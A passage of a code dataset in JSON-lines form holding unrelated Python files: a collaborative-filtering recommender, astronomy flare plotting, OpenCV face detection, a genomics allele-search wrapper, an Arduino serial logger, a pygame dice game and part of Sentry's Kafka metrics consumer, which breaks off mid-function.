users_no_sim))\n\n#\t\tlogging.info(\"top%d of %s is %s\" % (topK, user1_id, user_sim_topK[user1_id]))\n\n\t\t#根据相似度 topK 来计算用户对相应的item categories的权值\n\t\titem_category_weight = calcuteItemCategoryWeight(user1_id, user_sim_topK[user1_id])\n\n\t\t# final weight = 根据相似度 topK 得到的 item categories的权值 * 根据behavior 得到的 item category weight \n\t\t# 推荐 final weight 最大的 category\n\t\tfor category, weight in item_category_weight.items():\n\t\t\titem_category_weight[category] = global_user_item_dict[user1_id][category][\"w\"] * weight\n\n\t\tsorted_category_weight = sorted(item_category_weight.items(), key=lambda d:d[1], reverse=True)\n#\t\tlogging.info(\"user [%s] sorted final category weight %s\" % 
(user1_id, sorted_category_weight))\n\n\t\t# the category with the largest final weight\n\t\tcategory = sorted_category_weight[0][0]\n\t\tweight = sorted_category_weight[0][1]\n\t\tfinalRecommendation(user1_id, category)\n\treturn 0\n\ndef finalRecommendation(user_id, category):\n\tif (category not in global_train_item):\n\t\treturn\n\n\tfor item_id in global_train_item[category]:\n\t\toutputFile.write(\"%s,%s\\n\" % (user_id, item_id[0]))\n\n\treturn 0\n\n# use the similarity topK to compute the user's weights for the corresponding item categories\ndef calcuteItemCategoryWeight(user_id, user_sim_topK):\n\titem_category_weight = dict()\n\n\t# use the similarities in topK to weight every item category the user has interacted with\t\t\n\tfor item_category in global_user_item_dict[user_id].keys():\n\t\titem_category_weight[item_category] = 0.0\n\n\t\tfor user_idx in range(len(user_sim_topK)):\n\n\t\t    user_in_topK = user_sim_topK[user_idx][0]\n\t\t    sim_in_topK = user_sim_topK[user_idx][1]\n\n\t\t    if (item_category in global_user_item_dict[user_in_topK]):\n\t\t    \titem_category_weight[item_category] += sim_in_topK\n\n\t\t#logging.info(\"user [%s] topK category weight [%s -- %.3f]\" % (user_id, item_category, item_category_weight[item_category]))\n\treturn item_category_weight\n\n    # sort by weight in descending order and return a list\n\t#return sorted(item_category_weight.items(), key=lambda d:d[1], reverse=True)\n\ndef UserCollaborativeFiltering():\n\tuserSimilarity_IIF()\n\treturn 0\n","repo_name":"im2608/taobao_fresh","sub_path":"src/userCF.py","file_name":"userCF.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42874529232","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom astropy.io import fits\nfrom flareTools import id_segments\n\nmpl.rcParams.update({'font.size': 18, 'font.family': 'STIXGeneral', 'mathtext.fontset': 'stix',\n                     'image.cmap': 'viridis'})\n\nprefix = 'sec1'\npath = '/astro/store/gradscratch/tmp/scw7/tessData/lightcurves/' + prefix + '/'\ndf = pd.read_csv(prefix+'_flare_out.csv')\ndf_par = pd.read_csv(prefix+'_param_out.csv')\n\nfiles = np.unique(df['file'].values)\n\nfor filename in files:\n    tstart = df[df['file'] == filename]['t0'].values\n    tstop = df[df['file'] == filename]['t1'].values\n    \n    entry = df[df['file'] == filename]\n    \n    fig, axes = plt.subplots(figsize=(16,8), nrows=1, ncols=2)\n    \n    with fits.open(path+filename, mode='readonly') as hdulist:\n        tess_bjd = hdulist[1].data['TIME']\n        pdcsap_flux = hdulist[1].data['PDCSAP_FLUX']\n        pdcsap_flux_error = hdulist[1].data['PDCSAP_FLUX_ERR']\n        quality = hdulist[1].data['QUALITY']\n    \n    time_smo, smo = np.loadtxt(path+filename+'.gp')\n    ok_cut = (quality == 0) & (~np.isnan(tess_bjd)) & (~np.isnan(pdcsap_flux)) & (~np.isnan(pdcsap_flux_error))\n    \n    dt_limit = 12/24 # 12 hours\n    trim = 4/24 # 4 hours\n    istart, istop = id_segments(tess_bjd[ok_cut], dt_limit, dt_trim=trim)\n\n    time_c = np.array([])\n    flux_c = np.array([])\n    error_c = np.array([])\n\n    for seg_idx in range(len(istart)):\n        tess_bjd_seg = tess_bjd[ok_cut][istart[seg_idx]:istop[seg_idx]]\n        pdcsap_flux_seg = pdcsap_flux[ok_cut][istart[seg_idx]:istop[seg_idx]]\n        pdcsap_flux_error_seg = pdcsap_flux_error[ok_cut][istart[seg_idx]:istop[seg_idx]]\n\n        time_c = np.concatenate((time_c, tess_bjd_seg), axis=0)\n        flux_c = np.concatenate((flux_c, pdcsap_flux_seg), axis=0)\n        error_c = np.concatenate((error_c, pdcsap_flux_error_seg), axis=0)\n    \n    median = np.nanmedian(flux_c)\n    \n    axes[0].plot(time_c, flux_c/median)\n    axes[0].plot(time_smo, smo)\n    
axes[0].set_xlabel('Time [BJD - 2457000, days]')\n axes[0].set_ylabel('Flux [e-/s]')\n axes[0].set_title(filename)\n \n x = time_c\n y = flux_c/median - smo + 1\n axes[1].plot(x, y)\n for idx in range(len((tstart))):\n indices = np.where((x >= tstart[idx]) & (x <= tstop[idx]))[0]\n marker = 'x'\n if (entry.iloc[idx]['g_chisq']/entry.iloc[idx]['f_chisq'] > 2) and (entry.iloc[idx]['ed_err']*3 < entry.iloc[idx]['ed']):\n marker = 'o'\n axes[1].plot(x[indices], y[indices], marker)\n axes[1].set_xlabel('Time [BJD - 2457000, days]')\n axes[1].set_ylabel('Normalized Flux')\n plt.savefig('/astro/store/gradscratch/tmp/scw7/tessData/plots/'+filename+'.png')\n plt.close()\n","repo_name":"spencerw/tess_flare","sub_path":"plotLCs.py","file_name":"plotLCs.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11819372449","text":"#!/usr/bin/env python3\n# -*- coding = utf-8 -*-\nimport os\nimport sys\nimport argparse\n\nimport cv2\nimport imutils\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom util.baseimgops import resize, grayscale\n\n# If running from an IDE (not from command line), then enter images here.\nuserimages = [\"test_imgs/groupphoto.jpg\"]\n\n# Load DNN\ndatadir = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"data\", \"dnnfile\")\nnet = cv2.dnn.readNetFromCaffe(os.path.join(datadir, \"model.prototxt\"),\n os.path.join(datadir, \"res10_300x300_ssd_iter_140000_fp16.caffemodel\"))\n\n# Choose Images from LFW\nlfwpath = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"lfw\")\nlfwfiles = os.listdir(lfwpath)\n# Watch out for .DS_Store on MacOS.\nif sys.platform == \"darwin\" and \".DS_Store\" in lfwfiles:\n del lfwfiles[lfwfiles.index(\".DS_Store\")]\n\nrandoms = np.random.randint(1, len(lfwfiles), size = (36))\n\n# Choose image and detect.\nsavedir = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"modded\")\nfor r in randoms:\n img = os.listdir(os.path.join(lfwpath, lfwfiles[r]))[0]\n file, extension = os.path.splitext(img)\n img = cv2.imread(os.path.join(lfwpath, lfwfiles[r], img))\n\n (h, w) = img.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(img, (300, 300)), 1.0, (300, 300), swapRB=False, crop=False)\n net.setInput(blob)\n faces = net.forward()\n for i in range(0, faces.shape[2]):\n c = faces[0, 0, i, 2]\n if c < 0.5: continue\n box = faces[0, 0, i, 3:7] * np.array([w, h, w, h])\n (x, y, xe, ye) = box.astype(\"int\")\n cv2.rectangle(img, (x, y), (xe, ye), (0, 255, 255), 2)\n\n cv2.imwrite(os.path.join(savedir or \"\", f\"{file}-detect{extension}\"), img)\n\n# Display as a single image.\nsaved_images = os.listdir(savedir)\nfig = plt.figure()\nimg = cv2.imread(os.path.join(savedir, saved_images[0]))\nfinalimg = []\n\nglobal images\ni = 0\nfor a in range(6):\n for b in range(6):\n pixels = cv2.imread(os.path.join(savedir, saved_images[i]))\n if b == 0:\n images = np.array(pixels)\n else:\n images = np.vstack([images, pixels])\n i += 1\n if a == 0:\n finalimg = np.array(images)\n else:\n finalimg = np.hstack([finalimg, images])\n\ncv2.imwrite('images/allfaces.jpg', finalimg)\n\ncv2.imshow('frame', 
finalimg)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"amogh7joshi/engagement-detection","sub_path":"examples/facedetectionexample.py","file_name":"facedetectionexample.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"70379127606","text":"# © 2019 University of Illinois Board of Trustees. All rights reserved\nimport libCallability\nfrom PySamFastaWrapper import PySamFastaWrapper as ReferenceCache\nimport logging\nimport numpy as np\n\ntry:\n profile\nexcept Exception:\n def profile(x):\n return x\n\n\nclass LocationOutOfBounds(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\ndef get_hp(tags):\n for item in tags:\n if len(item) == 2 and item[0] == \"HP\":\n return item\n\n return (\"HP\", 0)\n\n\nclass AlleleSearcherLite:\n \"\"\"\n This file provides a python wrapper for the C++ AlleleSearcherLite class\n \"\"\"\n @profile\n def __init__(\n self,\n container,\n start,\n stop,\n ref,\n featureLength=150,\n pacbio=False,\n strict=True,\n useInternalLeftAlignment=False,\n noAlleleLevelFilter=False,\n hybrid_hotspot=False,\n mapq_threshold=10,\n q_threshold=10,\n reassembly_size=10,\n include_hp_tags=False,\n ):\n \"\"\"\n :param container: list/PileupContainerLite\n List of pileupcontainer objects or a single pileupcontainer object\n\n :param start: int\n Left limiting position of interest\n\n :param stop: int\n Right limiting position of interest\n\n :param ref: str/ReferenceCache\n Either path to the reference cache or the reference cache\n\n :param featureLength: int\n Length of feature map\n\n :param pacbio: bool\n Indicate that the reads are for PacBio if we are only using one container\n\n :param strict: bool\n Whether a differingRegion should strictly fall with start and stop\n\n :param useInternalLeftAlignment: bool\n Enable use of C++-based cigar left-alignment\n\n :param noAlleleLevelFilter: bool\n Do not use allele-level filters\n\n :param hybrid_hotspot: bool\n Enable hybrid hotspot detection\n\n :param mapq_threshold: int\n Minimum mapq threshold\n\n :param q_threshold: int\n Minimum quality threshold\n\n :param reassembly_size: int\n Size of reassembly region\n\n :param include_hp_tags: bool\n Include hp tags\n \"\"\"\n self.start = start\n self.stop = stop\n self.strict = strict\n self.featureLength = featureLength\n self.noAlleleLevelFilter = noAlleleLevelFilter\n containers = container if (type(container) is list) else [container]\n self.containers = containers\n self.reassembly_size = reassembly_size\n\n # Arguments for C++ searcher\n reads = []\n names = []\n qualities = []\n refStarts = []\n references = []\n mapq = []\n orientation = []\n cigartuples = []\n hp = []\n self.noReads = [False for i in containers]\n self.pacbio = (len(containers) == 1) and pacbio\n self.hybrid = len(containers) > 1\n self.include_hp_tags = include_hp_tags\n\n for i, container_ in enumerate(containers):\n if len(container_.pileupreads) != 0:\n cigartuples += [[list(x) for x in cigartuple] for cigartuple in container_.cigartuples]\n reads += [p.alignment.query_sequence for p in container_.pileupreads]\n names += [p.alignment.query_name for p in container_.pileupreads]\n qualities += [p.alignment.query_qualities for p in container_.pileupreads]\n refStarts += [p.alignment.reference_start for p in container_.pileupreads]\n mapq += [p.alignment.mapping_quality for p in 
container_.pileupreads]\n orientation += [-1 if p.alignment.is_reverse else 1 for p in container_.pileupreads]\n hp = [get_hp(p.alignment.tags)[1] for p in container_.pileupreads]\n else:\n self.noReads[i] = True\n\n if type(ref) is str:\n self.ref = ReferenceCache(database=ref, chrom=containers[0].chromosome)\n else:\n self.ref = ref\n self.ref.chrom = containers[0].chromosome\n\n windowStart = min(refStarts + [start]) - 10\n windowEnd = -float('inf') # max([container_.referenceEnd for container_ in containers]) + 10\n\n for c in containers:\n if len(c.pileupreads) > 0:\n windowEnd = max(windowEnd, c.referenceEnd)\n\n if windowStart < 0:\n raise LocationOutOfBounds\n\n if windowEnd > len(self.ref):\n raise LocationOutOfBounds\n\n if windowEnd < 0:\n raise LocationOutOfBounds\n\n windowEnd += 10\n reference = ''.join(self.ref[windowStart: windowEnd])\n\n if len(containers) == 1:\n pacbio_flags = [pacbio for i in reads] \n else:\n pacbio_flags = [False for i in containers[0].pileupreads] + [True for i in containers[1].pileupreads]\n \n self.searcher = libCallability.AlleleSearcherLite(\n reads,\n names,\n qualities,\n cigartuples,\n refStarts,\n mapq,\n orientation,\n pacbio_flags,\n hp,\n reference,\n windowStart,\n start,\n stop,\n hybrid_hotspot\n )\n\n self.searcher.minMapQ = mapq_threshold\n self.searcher.qThreshold = q_threshold\n self.searcher.max_reassembly_region_size = reassembly_size\n\n logging.debug(\"Set mapq threshold, q threshold to %d, %d\" % (self.searcher.minMapQ, self.searcher.qThreshold))\n\n self.searcher.initialize()\n\n x = self.differingRegions\n\n @property\n def refAllele(self):\n return self.searcher.refAllele\n\n @property\n def differingRegions(self):\n if all(self.noReads):\n return []\n\n if hasattr(self, 'regions'):\n return self.regions\n\n self.searcher.determineDifferingRegions(self.strict)\n\n self.regions = [\n (\n max(self.start, item.first), min(self.stop, item.second)\n ) for item in self.searcher.differingRegions\n ]\n\n return self.regions\n\n @property\n def allelesAtSite(self):\n alleles = set()\n\n if all(self.noReads):\n return alleles\n\n for item in self.searcher.allelesAtSite:\n alleles.add(item)\n\n return alleles\n\n def addAlleleForAssembly(self, allele):\n \"\"\"\n Set an allele for assembly. 
When alleles are set, assembly uses\n        only the set alleles.\n\n        :param allele: str\n            Allele to be used for assembly\n        \"\"\"\n        if not all(self.noReads):\n            self.searcher.addAlleleForAssembly(allele)\n\n    @profile\n    def computeFeatures(self, allele, index=0):\n        \"\"\"\n        Computes features for a given allele\n\n        :param allele: str\n            Allele for which features are to be computed\n\n        :param index: int\n            The read set for which features are to be released\n\n        :return: np.ndarray\n            Feature using numpy\n        \"\"\"\n        if self.noReads[index if self.hybrid else 0]:\n            return np.zeros(shape=(\n                1, self.featureLength, 7 if self.include_hp_tags else 6), dtype=np.uint8)\n        else:\n            index = index == 1 if self.hybrid else self.pacbio\n            return self.searcher.computeFeaturesColoredSimple(\n                allele, self.featureLength, index, self.include_hp_tags)\n\n    @property\n    def cluster(self):\n        return self.differingRegions\n\n    @profile\n    def assemble_region(self):\n        \"\"\"\n        Assemble the complete region\n        \"\"\"\n        reassemble = False\n\n        if len(self.containers) == 2:\n            if self.containers[0].average_coverage > 14:\n                reassemble = True\n\n        self.searcher.assemble_alleles_from_reads(reassemble)\n\n    @profile\n    def assemble(self, start=None, stop=None):\n        \"\"\"\n        Performs assembly between start and stop\n\n        :param start: int\n            start position of suspected allele\n\n        :param stop: int\n            stop position of suspected allele\n\n        :return: iterable\n            List-like object\n        \"\"\"\n        if all(self.noReads):\n            return\n\n        if start is None:\n            start = self.start\n\n        if stop is None:\n            stop = self.stop\n\n        self.searcher.assemble(start, stop)\n\n    def numReadsSupportingAlleleStrict(self, allele, index):\n        \"\"\"\n        Provides the number of reads fully encapsulating an allele\n\n        :param allele: str\n            Allele for which the number of supporting reads is desired\n\n        :param index: int\n            Read set for which query is being made\n\n        :return: int\n            Number of reads supporting the given allele\n        \"\"\"\n        if self.noReads[index if self.hybrid else 0]:\n            return 0\n\n        index = index == 1 if self.hybrid else self.pacbio\n        return self.searcher.numReadsSupportingAlleleStrict(allele, index)\n\n    def determineAllelesInRegion(self, start, stop):\n        \"\"\"\n        Function determines alleles in region without performing assembly (unlike property allelesAtSite)\n\n        :param start: int\n            Start of region\n\n        :param stop: int\n            End of region\n\n        :return: list\n            List of alleles from reads\n        \"\"\"\n        if all(self.noReads):\n            return []\n        else:\n            return list(self.searcher.determineAllelesAtSite(start, stop))\n\n    def clearAllelesForAssembly(self):\n        \"\"\"\n        Clears preset alleles for assembly\n        \"\"\"\n        if not all(self.noReads):\n            self.searcher.clearAllelesForAssembly()\n\n","repo_name":"anands-repo/hello","sub_path":"python/AlleleSearcherLite.py","file_name":"AlleleSearcherLite.py","file_ext":"py","file_size_in_byte":9781,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"40197438540","text":"## import libraries\nimport serial\nimport time\nimport datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## set COM and wait for connection (Arduino Serial Monitor must be closed)\ncomm_error = True\nwhile comm_error:\n    try:\n        ser = serial.Serial('COM3', 9600)\n        print('Connected to COM3!')\n        comm_error = False\n    except:\n        print('Waiting for connection to COM3...')\n        time.sleep(3)\n\n## read number_of_cycles readings from serial and save to a dataframe\nnumber_of_cycles = 5\ncounter = 0\ndf = pd.DataFrame(columns=['timestamp','temperature']) # set up 
dataframe\nstart_time = datetime.datetime.now() # log start time of data collection\n\nwhile (counter < number_of_cycles):\n    try:\n        serial_data = ser.readline()\n        decoded_serial_data = float(serial_data[0:len(serial_data)-2].decode(\"utf-8\"))\n        time_now = datetime.datetime.now()\n        print(\"Counter: {} Time: {} Serial: {}\".format(counter,time_now,decoded_serial_data))\n        df = df.append(pd.Series([time_now,decoded_serial_data], index=df.columns ), ignore_index=True)\n        #time.sleep(2)\n        counter+=1\n    \n    except:\n        print(\"read interrupted, stopping data collection\")\n        break\n\n## plot data and save figure to png\ndf.plot(kind='line',x='timestamp',y='temperature',color='blue')\nplt.savefig(start_time.strftime(\"%Y%m%d%H%M%S\")+'.png')\n","repo_name":"kylehorton33/compostSensors","sub_path":"serialReader.py","file_name":"serialReader.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32742765282","text":"import pygame\nimport pygame.draw\nimport pygame.font\nimport pygame.transform\nimport sys\nfrom pygame.locals import *\nimport random\nimport pygame.mixer\n\npygame.init()\npygame.font.init()\npygame.mixer.init()\n\n# Base setup\ntitle = \"Dice Rolling Simulator\"\nwidth, height = 1200, 900\n\nFPS = 60\n\nclock = pygame.time.Clock()\n\ndisplay = pygame.display.set_mode((width, height))\npygame.display.set_caption(title)\n\n\n# Dice face images\ndices = [\n    pygame.image.load(\"assets/die1.png\").convert_alpha(),\n    pygame.image.load(\"assets/die2.png\").convert_alpha(),\n    pygame.image.load(\"assets/die3.png\").convert_alpha(),\n    pygame.image.load(\"assets/die4.png\").convert_alpha(),\n    pygame.image.load(\"assets/die5.png\").convert_alpha(),\n    pygame.image.load(\"assets/die6.png\").convert_alpha(),\n]\ndefault_dice = dices[0]\n\n\n\n# Dice Audio\ndice_roll = pygame.mixer.Sound(\"assets/dice_roll.wav\")\n\n\n\n# Game Class\nclass Game():\n    def __init__(self):\n        self.run = 1\n\n        self.current_dice = default_dice\n        self.current_dice_rect = pygame.Rect(\n            width/2 - self.current_dice.get_width()/2,\n            height/2 - self.current_dice.get_height()/2,\n            self.current_dice.get_width(),\n            self.current_dice.get_height()\n        )\n\n\n        # Title\n        self.title_font = pygame.font.SysFont(\"ComicSans\", 100)\n        self.title_render = self.title_font.render(\"Dice Rolling Simulator\", True, (255,255,255))\n\n\n        # Roll Button\n        self.roll_button = pygame.Rect(width/2 - 300/2, height - 200, 300, 80)\n        self.roll_font = pygame.font.SysFont(\"ComicSans\", 50)\n        self.roll_render = self.roll_font.render(\"Roll The Dice\", True, (50, 50, 50))\n\n\n        # Animate \n        self.animate = False\n\n    def draw(self):\n        display.fill((50,50,50))\n\n        pygame.draw.rect(display, (255,255,255), self.roll_button)\n        \n        display.blit(self.roll_render, (self.roll_button.x + self.roll_render.get_width()/4 - 10, self.roll_button.y + self.roll_render.get_height() - 10))\n\n        if self.animate:\n            for dice in dices:\n                display.blit(dice, (self.current_dice_rect.x, self.current_dice_rect.y))\n            \n            self.animate = False\n\n        else:\n            display.blit(self.current_dice, (self.current_dice_rect.x, self.current_dice_rect.y))\n\n\n        display.blit(self.title_render, (width/2 - self.title_render.get_width()/2, 100))\n\n        pygame.display.update()\n    \n\n    def start(self):\n        # Game loop\n        while self.run:\n\n            mouse_pos = pygame.mouse.get_pos()\n            \n            clock.tick(FPS)\n\n            self.draw()\n\n            # Handling Events\n            for event in pygame.event.get():\n                # Quit Event\n                if event.type == QUIT:\n                    self.run = 0\n                    pygame.quit()\n                    sys.exit()\n\n                if 
event.type == MOUSEBUTTONDOWN:\n if self.roll_button.collidepoint(mouse_pos):\n self.animate = True\n dice_roll.play()\n self.current_dice = random.choice(dices)\n\n\n\nGame().start()\n \n ","repo_name":"formerzayed/Dice-Rolling-Simulator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73987614326","text":"import functools\nimport logging\nimport time\nfrom collections import defaultdict, deque\nfrom concurrent.futures import Future\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom functools import partial\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Deque,\n List,\n Mapping,\n MutableMapping,\n NamedTuple,\n Optional,\n Set,\n Union,\n)\n\nfrom arroyo.backends.abstract import Producer as AbstractProducer\nfrom arroyo.backends.kafka import KafkaConsumer, KafkaPayload, KafkaProducer\nfrom arroyo.processing import StreamProcessor\nfrom arroyo.processing.strategies import MessageRejected\nfrom arroyo.processing.strategies import ProcessingStrategy\nfrom arroyo.processing.strategies import ProcessingStrategy as ProcessingStep\nfrom arroyo.processing.strategies import ProcessingStrategyFactory\nfrom arroyo.processing.strategies.streaming.transform import ParallelTransformStep\nfrom arroyo.types import Message, Partition, Position, Topic\nfrom confluent_kafka import Producer\nfrom django.conf import settings\n\nfrom sentry.utils import json, kafka_config\nfrom sentry.utils.batching_kafka_consumer import create_topics\n\nDEFAULT_QUEUED_MAX_MESSAGE_KBYTES = 50000\nDEFAULT_QUEUED_MIN_MESSAGES = 100000\n\nlogger = logging.getLogger(__name__)\n\nMessageBatch = List[Message[KafkaPayload]]\n\n\ndef initializer() -> None:\n from sentry.runner import configure\n\n configure()\n\n\n@functools.lru_cache(maxsize=10)\ndef get_indexer(): # type: ignore\n from sentry.sentry_metrics import indexer\n\n return indexer\n\n\n@functools.lru_cache(maxsize=10)\ndef get_metrics(): # type: ignore\n from sentry.utils import metrics\n\n return metrics\n\n\ndef get_config(topic: str, group_id: str, auto_offset_reset: str) -> MutableMapping[Any, Any]:\n cluster_name: str = settings.KAFKA_TOPICS[topic][\"cluster\"]\n consumer_config: MutableMapping[Any, Any] = kafka_config.get_kafka_consumer_cluster_options(\n cluster_name,\n override_params={\n \"auto.offset.reset\": auto_offset_reset,\n \"enable.auto.commit\": False,\n \"enable.auto.offset.store\": False,\n \"group.id\": group_id,\n # `default.topic.config` is now deprecated.\n # More details: https://docs.confluent.io/platform/current/clients/confluent-kafka-python/html/index.html#kafka-client-configuration)\n \"default.topic.config\": {\"auto.offset.reset\": auto_offset_reset},\n # overridden to reduce memory usage when there's a large backlog\n \"queued.max.messages.kbytes\": DEFAULT_QUEUED_MAX_MESSAGE_KBYTES,\n \"queued.min.messages\": DEFAULT_QUEUED_MIN_MESSAGES,\n },\n )\n return consumer_config\n\n\nclass DuplicateMessage(Exception):\n pass\n\n\nclass MetricsBatchBuilder:\n \"\"\"\n Batches up individual messages - type: Message[KafkaPayload] - into a\n list, which will later be the payload for the big outer message\n that gets passed through to the ParallelTransformStep.\n\n See `__flush` method of BatchMessages for when that happens.\n \"\"\"\n\n def __init__(self, max_batch_size: int, max_batch_time: float) -> None:\n self.__messages: MessageBatch = []\n self.__max_batch_size = 
max_batch_size\n self.__deadline = time.time() + max_batch_time / 1000.0\n self.__offsets: Set[int] = set()\n\n def __len__(self) -> int:\n return len(self.__messages)\n\n @property\n def messages(self) -> MessageBatch:\n return self.__messages\n\n def append(self, message: Message[KafkaPayload]) -> None:\n if message.offset in self.__offsets:\n raise DuplicateMessage\n self.__messages.append(message)\n self.__offsets.add(message.offset)\n\n def ready(self) -> bool:\n if len(self.messages) >= self.__max_batch_size:\n return True\n elif time.time() >= self.__deadline:\n return True\n else:\n return False\n\n\nclass BatchMessages(ProcessingStep[KafkaPayload]): # type: ignore\n \"\"\"\n First processing step in the MetricsConsumerStrategyFactory.\n Keeps track of a batch of messages (using the MetricsBatchBuilder)\n and then when at capacity, either max_batch_time or max_batch_size,\n flushes the batch.\n\n Flushing the batch here means wrapping the batch in a Message, the batch\n itself being the payload. This is what the ParallelTransformStep will\n process in the process_message function.\n \"\"\"\n\n def __init__(\n self,\n next_step: ProcessingStrategy[MessageBatch],\n max_batch_time: float,\n max_batch_size: int,\n ):\n self.__max_batch_size = max_batch_size\n self.__max_batch_time = max_batch_time\n\n self.__next_step = next_step\n self.__batch: Optional[MetricsBatchBuilder] = None\n self.__closed = False\n\n def poll(self) -> None:\n assert not self.__closed\n\n self.__next_step.poll()\n\n if self.__batch and self.__batch.ready():\n try:\n self.__flush()\n except MessageRejected:\n # Probably means that we have received back pressure due to the\n # ParallelTransformStep.\n logger.debug(\"Attempt to flush batch failed...Re-trying in next poll\")\n pass\n\n def submit(self, message: Message[KafkaPayload]) -> None:\n if self.__batch is None:\n self.__batch = MetricsBatchBuilder(self.__max_batch_size, self.__max_batch_time)\n\n try:\n self.__batch.append(message)\n except DuplicateMessage:\n # If we are getting back pressure from the next_step (ParallelTransformStep),\n # the consumer will keep trying to submit the same carried over message\n # until it succeeds and stops throwing the MessageRejected error. 
In this\n            # case we don't want to keep adding the same message to the batch over and\n            # over again\n            logger.debug(f\"Message already added to batch with offset: {message.offset}\")\n            pass\n\n        if self.__batch and self.__batch.ready():\n            self.__flush()\n\n    def __flush(self) -> None:\n        if not self.__batch:\n            return\n        last = self.__batch.messages[-1]\n\n        new_message = Message(last.partition, last.offset, self.__batch.messages, last.timestamp)\n\n        self.__next_step.submit(new_message)\n        self.__batch = None\n\n    def terminate(self) -> None:\n        self.__closed = True\n        self.__next_step.terminate()\n\n    def close(self) -> None:\n        self.__closed = True\n\n    def join(self, timeout: Optional[float] = None) -> None:\n        if self.__batch:\n            last = self.__batch.messages[-1]\n            logger.debug(\n                f\"Abandoning batch of {len(self.__batch)} messages...latest offset: {last.offset}\"\n            )\n\n        self.__next_step.close()\n        self.__next_step.join(timeout)\n\n\nif TYPE_CHECKING:\n\n    class ProducerResultFuture(NamedTuple):\n        message: Message[KafkaPayload]\n        future: Future[Message[KafkaPayload]]\n\n\nelse:\n\n    class ProducerResultFuture(NamedTuple):\n        message: Message[KafkaPayload]\n        future: Future\n\n\nclass ProduceStep(ProcessingStep[MessageBatch]):  # type: ignore\n    \"\"\"\n    Step that produces to the snuba-metrics topic, collecting the futures returned by\n    the producer. Continuously checks to see if futures are done, and once that's the case\n    can commit up to the last future that is done.\n    \"\"\"\n\n    def __init__(\n        self,\n        commit_function: Callable[[Mapping[Partition, Position]], None],\n        producer: Optional[AbstractProducer] = None,\n    ) -> None:\n        if not producer:\n            snuba_metrics = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS]\n            snuba_metrics_producer = KafkaProducer(\n                kafka_config.get_kafka_producer_cluster_options(snuba_metrics[\"cluster\"]),\n            )\n            producer = snuba_metrics_producer\n        self.__producer = producer\n        self.__producer_topic = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS].get(\n            \"topic\", \"snuba-metrics\"\n        )\n        self.__commit_function = commit_function\n\n        self.__futures: Deque[ProducerResultFuture] = deque()\n        self.__closed = False\n\n        # TODO(meredith): make this an option to pass in\n        self.__max_buffer_size = 10000\n\n        # XXX(meredith): This is only temporary to record how much\n        # time we spend committing when we commit once per message\n        # instead of batching commits\n        self.__commit_start = time.time()\n        self.__commit_duration_sum = 0.0\n        self.__metrics = get_metrics()\n\n    def poll(self) -> None:\n        while self.__futures:\n            if not self.__futures[0].future.done():\n                break\n\n            result_future = self.__futures.popleft()\n            message, future = result_future\n\n            try:\n                future.result()\n            except Exception:\n                # TODO(meredith): log info for the different errors\n                # that could happen:\n                # * CancelledError (future was cancelled)\n                # * TimeoutError (future timed out)\n                # * Exception (the future call raised an exception)\n                raise\n            start = time.time()\n            self.__commit_function({message.partition: Position(message.offset, message.timestamp)})\n            end = time.time()\n            commit_duration = end - start\n            self._record_commit_duration(commit_duration)\n\n    def _record_commit_duration(self, commit_duration: float) -> None:\n        self.__commit_duration_sum += commit_duration\n\n        # record commit durations every 5 seconds\n        if (self.__commit_start + 5) < time.time():\n            self.__metrics.incr(\n                \"produce_step.commit_duration\", amount=int(self.__commit_duration_sum)\n            )\n            self.__commit_duration_sum = 0\n            self.__commit_start = time.time()\n\n    def 
submit(self, outer_message: Message[MessageBatch]) -> None:\n assert not self.__closed\n\n if len(self.__futures) >= self.__max_buffer_size:\n raise MessageRejected\n\n for message in outer_message.payload:\n payload = message.payload\n future = self.__producer.produce(\n destination=Topic(self.__producer_topic),\n payload=payload,\n )\n self.__futures.append(ProducerResultFuture(message, future))\n\n def close(self) -> None:\n self.__closed = True\n\n def terminate(self) -> None:\n self.__closed = True\n\n self.__producer.close()\n\n def join(self, timeout: Optional[float] = None) -> None:\n start = time.time()\n while self.__futures:\n remaining = timeout - (time.time() - start) if timeout is not None else None\n if remaining is not None and remaining <= 0:\n logger.warning(f\"Timed out with {len(self.__futures)} futures in queue\")\n break\n\n message, future = self.__futures.popleft()\n\n future.result(remaining)\n\n self.__commit_function({message.partition: Position(message.offset, message.timestamp)})\n self.__producer.close()\n\n\ndef process_messages(\n outer_message: Message[MessageBatch],\n) -> MessageBatch:\n \"\"\"\n We have an outer_message Message() whose payload is a batch of Message() objects.\n\n Message(\n partition=...,\n offset=...\n timestamp=...\n payload=[Message(...), Message(...), etc]\n )\n\n The inner messages payloads are KafkaPayload's that have:\n * key\n * headers\n * value\n\n The value of the message is what we need to parse and then translate\n using the indexer.\n \"\"\"\n indexer = get_indexer()\n metrics = get_metrics()\n\n org_strings = defaultdict(set)\n strings = set()\n with metrics.timer(\"process_messages.parse_outer_message\"):\n parsed_payloads_by_offset 